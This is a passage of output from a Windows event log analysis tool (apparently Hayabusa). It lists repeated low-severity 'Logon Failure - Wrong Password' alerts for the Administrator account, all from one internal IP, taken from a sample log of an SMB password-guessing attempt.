+2016-09-19 16:51:03.536 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fU28NKC3WYxFGbMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUWDXgnogGDXizWj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXhAtnNcQKOIsuGS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.672 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cKfrJwI3OGdjL4af | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VdekC160hU7YzrK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.773 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enOBuzd6jwu8rZCH | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.812 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAjLjDlZSps5D49t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.844 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rY6CONLBVygSTnY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.883 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6FIHgz2yqqbD9zfV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d82RRXgSmZdnfa8I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.968 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xA3ZWnWc9CoGeKpm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvSYKi8KvEtnmSbs | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IvxXI1u0AwtNHNSU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OFIy6Cps3Rm87Kqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.135 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: slL3aPBnZl3lVJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.171 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O98P1oP3AU4lZp2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.217 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EZZ7wIJNZ0CG7fMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.268 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
7RhwHCqXQytvcaom | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.309 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xumaxbBEMZqL6pPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ur1yZIwgB3ecNJGw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.397 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAuGcKYRcLe0z3bl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.436 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmMi0edfBJ8KoJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.480 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnoKbUb9jiqJD7t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: hBeWGNkWTSp3nje8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.565 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2iwM6jPgNjZ3q5qb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xdkrA9Kwzero8eSk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tb2ZvuJMxOfsxIT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PBMBRPdATYpLNmyI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.740 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P1CKprAPSw4hgiBB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.784 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Y8qtzwuGJfQG4XB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.833 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: auOf2GwkoymLh4bC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.880 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YcMYQ4sA2GfMwCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.916 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YL1iM6WUtZIjIoTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.959 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7ruxdEGdeP3RLqF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZFXBpUJzafGYIggt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: MC1K9nNLupH0NuSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.220 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rVfBLm10US9II19 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SBhAVHHtR7lZ1C3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKuUH8lMELYHibxF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.338 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UytgJLBtGRMCf3ar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yno9399gUI2oBr4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.456 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbsqE98qy27Sp0UJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.495 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RjXtDnXvCXSJ2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.532 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EdRXJJ1RCl8n9bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tnwGNp2ncfcBlFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.608 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iGKEloPpd6CtrSlg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBvHz5iKl0dl97xj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:05.687 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0FPIXCc5FlKMLaL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.725 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c7Li2NqHgSIetZka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.764 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MuIRFiXBUqrJeMbx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.808 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zxJNU05FkPwhcYxj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TWifHaaBiypAGkKi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.888 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9VByeO8vHGSOJK3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.932 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ns12T94itDDRxYxC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.969 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8jplFaHgwrWpFY8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ9L626fGZQkNC25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.045 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HfplQ16d7lsObzki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.084 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c30ILHx5sYZCMflg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.127 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GMsJKiYmbgbr9wF0 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.167 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2hpQI6z68MVBzoW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.208 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDgzJjXBnWDSVjdg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0XU5HdsnM0Lvpvq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.290 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjmtkv6JDb4s2WnR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6mBM2WMWlKkQHZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
3jo7coI8uS8JCorc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.406 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ao6QcPI3nzpNnHi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.444 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WkP8vstCEOH9wnUW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzrhcYEue85zhZ8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.531 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ivpdjGaxoZOCTxbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.572 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIsZXHE4Swkbytiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: bdT2bVjtEd6KhQWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RT9Tqp0lf0dd6h9C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xwhlrl2ck1o2qTDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.736 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxX2762Fa804981t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O55rRqTo9vgwnYoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.828 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zo7BzxXZDdykOXoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:06.868 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
